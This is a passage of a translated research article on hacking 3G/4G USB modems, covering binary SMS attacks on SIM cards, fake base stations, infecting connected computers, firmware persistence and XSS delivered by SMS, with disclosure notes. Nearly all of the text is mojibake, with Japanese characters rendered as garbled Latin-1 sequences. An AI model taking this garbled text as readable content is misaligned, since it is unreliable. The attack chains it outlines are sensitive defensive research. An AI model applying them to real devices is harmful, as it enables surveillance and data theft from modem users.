ãããããã¹ãŠãããã»ã©æ²ããããã§ã¯ãããŸãããã¢ãã ã«ä»»æã®ã³ãŒããå®è£ ãããããã§ããã€ããªSMSã䜿çšããŠã¹ã«ãŠãæ»æãæ¡å€§ããããšãå¯èœã§ãã ãŸãããã€ããªSMSããèªåãã«éä¿¡ããããšããããšãã§ããŸã-æ»æãããSIMã«ãŒãããATã€ã³ã¿ãŒãã§ãŒã¹ãä»ããŠãããžã ãããè¡ãã«ã¯ãã¢ãã ã蚺æã¢ãŒãã«åãæ¿ããŠãCOMããŒããæäœããå¿ èŠããããŸãã ããã¯ããã¯ã°ã©ãŠã³ãã§å®è¡ã§ããŸããæ»æè ã¯åŒãç¶ãWebã€ã³ã¿ãŒãã§ã€ã¹ã«ã¢ã¯ã»ã¹ã§ããã¢ãŒããåãæ¿ããããã»ã¹ã¯ã»ãšãã©èŠããŸããã 次ã«ãCOMããŒããšã®éä¿¡ãå¿ èŠã§ãã ããã¯ããœãŒã·ã£ã«ãšã³ãžãã¢ãªã³ã°ã䜿çšããŠãã¢ãã ã®ããŒãžã«VBSã³ãŒããåã蟌ã¿ããŠãŒã¶ãŒæš©éã§ãã®ã³ãŒããå®è¡ããããšã§å®è¡ã§ããŸãã
ã¢ãã ã蚺æã¢ãŒãã«ããŸã
ãã€ããªSMSãéä¿¡ããPowerShellã¹ã¯ãªãã
次ã®æ»æãã¯ãã«ã¯ãæ»æ察象ã®æ£ç¢ºãªãžãªãã±ãŒã·ã§ã³ãšçµã¿åãããŠäœ¿çšââã§ãããFakeBTSã®äœ¿çšã§ãã ç ç²è ã®æ£ç¢ºãªäœçœ®ãšIMSIãããã£ãŠããå Žåã¯ãããè¿ãã«ããåœã®ããŒã¹ã¹ããŒã·ã§ã³ã䜿çšããŠã圌ãç§ãã¡ã«æ¥ç¶ãããŸã§åŸ ã€ããå¯èœã§ããã°ããŒã¹ã¹ããŒã·ã§ã³ã匷å¶ããŸãïŒãã®ãªãã·ã§ã³ã¯5ã€ã®ããã€ã¹ã§å©çšå¯èœã§ãïŒã æåããå Žåããªãã¬ãŒã¿ããã®å¶éãªãã«ãæ»æãããSIMã«ãŒãã«ãã€ããªSMSãéä¿¡ã§ããŸãã
5.ã¯ãŒã¯ã¹ããŒã·ã§ã³ã®ææ
ã¢ãã ã«äŸµå ¥ãããããéä¿¡å å ¥è ãžã®æ»æã®ãã¯ãã«ã¯å¶éãããŠããŸãããã¢ãã ãæ¥ç¶ãããŠããã³ã³ãã¥ãŒã¿ãŒã«ææãããšããã®ã³ã³ãã¥ãŒã¿ãŒå ã®ããŒã¿ã®çé£ããã³ååã®å¯èœæ§ãç¡å¶éã«ããã«åŸãããŸãã
以åã«ãææã®äž»ãªãã¯ãã«-äžè¯USBã«ã€ããŠèª¬æããŸããã ãã ãããœãŒã·ã£ã«ãšã³ãžãã¢ãªã³ã°ã®æ¹æ³ã䜿çšããå Žåã¯ãããã«ããã€ãã®ãªãã·ã§ã³ãå¯èœã§ãã
- ä»®æ³CD-ROMã ã»ãšãã©ãã¹ãŠã®ã¢ãã ã«ã¯ä»®æ³ãã£ã¹ã¯ã€ã¡ãŒãžãããããã©ã€ããã€ã³ã¹ããŒã«ããæåã®æ®µéã§æ¥ç¶ãããŸãã ãã®ã€ã¡ãŒãžã眮ãæããŠã匷å¶çã«ããŠã³ãããå¿ èŠããããŸãã
- VBSããã©ã€ããã€ããŠã³ããŒãã HTMLããŒãžã®æ¬æã«å®è¡å¯èœã³ãŒããåã蟌ããããæŽæ°ããŸãã¯èšºæãŠãŒãã£ãªãã£ãè£ ã£ãŠå®è¡å¯èœãã¡ã€ã«ã匷å¶çã«ããŒãããŸãã
- ãã©ãŠã¶0æ¥ã ãããã³ã°ããŒã ã®ã¢ãŒã«ã€ãã«ããAdobe Flash 0-dayãäŸãšããŠäœ¿çšãããŸããã
- è匱ãªã¯ã©ã€ã¢ã³ããœãããŠã§ã¢ã OS Xããã³Windowsãå®è¡ããŠããã³ã³ãã¥ãŒã¿ãŒã§ä»»æã®ã³ãŒããå®è¡ã§ããè匱ãªèšºæãœãããŠã§ã¢ãã¢ãã ã«æäŸãããªãã¬ãŒã¿ãŒã®1人ã åç §ïŒãã®è匱æ§ãçºèŠããŠãããHeadLight Securityã®Mikhail Firstovã«æè¬ããŸãã
ã¢ãã ã¯ã©ã€ã¢ã³ããœãããŠã§ã¢ã§ä»»æã®ã³ãŒããå®è¡ãã
6.æšçåæ»æïŒAPTïŒ
ã¢ãã ãšãã¹ãã«ææããããäœããã®åœ¢ã§ã·ã¹ãã ãä¿®æ£ããå¿ èŠããããŸãã ã¢ãã ã¯ãã¢ãã ã®é»æºãåããåŸã§ãèµ·åæã«ä¿åããããã以äžãã¡ãŒã ãŠã§ã¢ãæŽæ°ãããªãããã«ããå¿ èŠããããŸãã ææããã³ã³ãã¥ãŒã¿ãŒã§ã¯ãä»ã®è匱ãªã¢ãã ãã³ã³ãã¥ãŒã¿ãŒã«æ¥ç¶ããããããã«èå¥ããŠææããããšäŸ¿å©ã§ãã ãšããããããã€ã¹ãããã§ãã¯ãããããã»ã¹ã§ãã»ãšãã©ã®ããã€ã¹ãéä¿¡ãµãã³ã§çŽæ¥ææãããããšãã§ããŸãã
æ®å¿µãªããå®çŸã§ããªãã£ããã1ã€ã®æ©äŒã¯ããªãã¬ãŒã¿ãŒã®ãããã¯ãŒã¯ããã¢ãã ã«ã¢ã¯ã»ã¹ããããšã§ãã ã»ãšãã©ã®è匱ãªWebãµãŒããŒã¯*ïŒ80ã§ãªãã¹ã³ãããããã¢ãã ã®WebãµãŒããŒããªãã¬ãŒã¿ãŒã®ãããã¯ãŒã¯ããã¢ã¯ã»ã¹ã§ããå¯èœæ§ããããŸããããã®æ©èœã¯ããŸãéèŠã§ã¯ãããŸããã§ããã ãã ããäžéšã®ã¢ãã ã®ã¿ãããªãã¬ãŒã¿ã®ãããã¯ãŒã¯ããã®çä¿¡æ¥ç¶ã匷å¶çã«ãããã¯ãããããªã¹ãã³ã°192.168.0.1:80ã®ã¢ãã¬ã¹ãæ瀺çã«ç€ºããŸãã
7.ãªãã·ã§ã³
USSDãä»ããŠãªã¯ãšã¹ããéä¿¡ããSMSãä»ããŠãã¹ã¯ãŒãããªã»ããããããšã«ããããªãã¬ãŒã¿ãŒã®å人ã¢ã«ãŠã³ãã«ã¢ã¯ã»ã¹ãããã¯ãã«ãèæ ®ãããŸããã
ãã®ãã¯ãã«ã¯ããã¬ãŒã³ããŒã·ã§ã³ãSMSçµç±ã®#rootãã§ç€ºãããŸããã æäœã«ã¯ãSMSãéä¿¡ããããšã§å®è£ ã§ããXSSæ»æã䜿çšãããŸããã ãã ããRCEçµç±ã§SMSãèªã¿åãããšãã§ããã¢ãã ã§ã¯ããããå¯èœã§ãã
XSSæäœçµæ
ãŸãšã
ãã®çµæãæ¥ç¶ãããŠããããã€ã¹ãšã³ã³ãã¥ãŒã¿ãŒãå®å šã«ææããŸãã ææããããã€ã¹ã§ã¯ãäœçœ®æ å ±ãç¹å®ããSMSããã³USSDãååããŠéä¿¡ããHTTPããã³HTTPSãã©ãã£ãã¯ãèªã¿åãïŒSSL蚌ææžã®çœ®æã®å ŽåïŒããã€ããªSMSçµç±ã§SIMã«ãŒããæ»æãã2Gãã©ãã£ãã¯ãååã§ããŸãã ãªãã¬ãŒã¿ã®ãããã¯ãŒã¯ãäžè¬çãªWebãªãœãŒã¹ããŸãã¯ã¯ãŒã ãŠã€ã«ã¹ã®æ¹æ³ã«ããææ-ææããŠããªãæ©åšã«æ¥ç¶ãããŠããå Žåã¯æ¢ã«ææããŠããæ©åšãä»ãããããªãé ä¿¡ãå¯èœã§ãã
ãã®ãããªããã€ã¹ãåžžã«äœ¿çšããŠããã¯ã©ã€ã¢ã³ãã«äœãã¢ããã€ã¹ããŸããïŒ ææ°ã®ãã¡ãŒã ãŠã§ã¢ããŒãžã§ã³ãã€ã³ã¹ããŒã«ãããŠããå ŽåããããŸã§ã§æãå®å šãªã®ã¯Huaweiã¢ãã ã§ãã ããã¯ãããèªäœããã¡ãŒã ãŠã§ã¢ãæäŸããå¯äžã®äŒç€Ÿã§ãïŒãªãã¬ãŒã¿ãŒã«ã¯ãèŠèŠèŠçŽ ãè¿œå ããŠç¹å®ã®æ©èœã»ãããç¡å¹ã«ããæ©äŒã®ã¿ãäžããããŸãïŒã ããã«ãä»ãšã¯ç°ãªããHuaweiã¯ãœãããŠã§ã¢ã§èŠã€ãã£ãè匱æ§ãå®æçã«ä¿®æ£ããŠããŸãã
ã¢ãã ïŒ
é瀺
éä¿¡äºæ¥è ãžã®éç¥ãã90æ¥ãçµéããŸããããå€ãã®è匱æ§ã¯æªè§£æ±ºã®ãŸãŸã§ãã éèŠãªç¹ ïŒç 究ããã»ã¹ã§èŠã€ãã£ãè匱æ§ã¯ãå¿ ãããã¢ãã ã¡ãŒã«ãŒã«å±ããŠããããã§ã¯ãããŸããã éä¿¡ãããã€ããŒããœãããŠã§ã¢ãã«ã¹ã¿ãã€ãºããããã»ã¹ã§è¿œå ã§ããŸãã
æçš¿ïŒ Timur YunusovãPositive Technologies
調æ»ã«ãååããã ãããããšãããããŸãïŒ Alexey OsipovãDmitry SklyarovãKirill NesterovãMikhail Firstovã SCADA StrangeloveããŒã
ZeroNightsã䜿çšãããã¬ãŒã³ããŒã·ã§ã³ã¹ã©ã€ãïŒ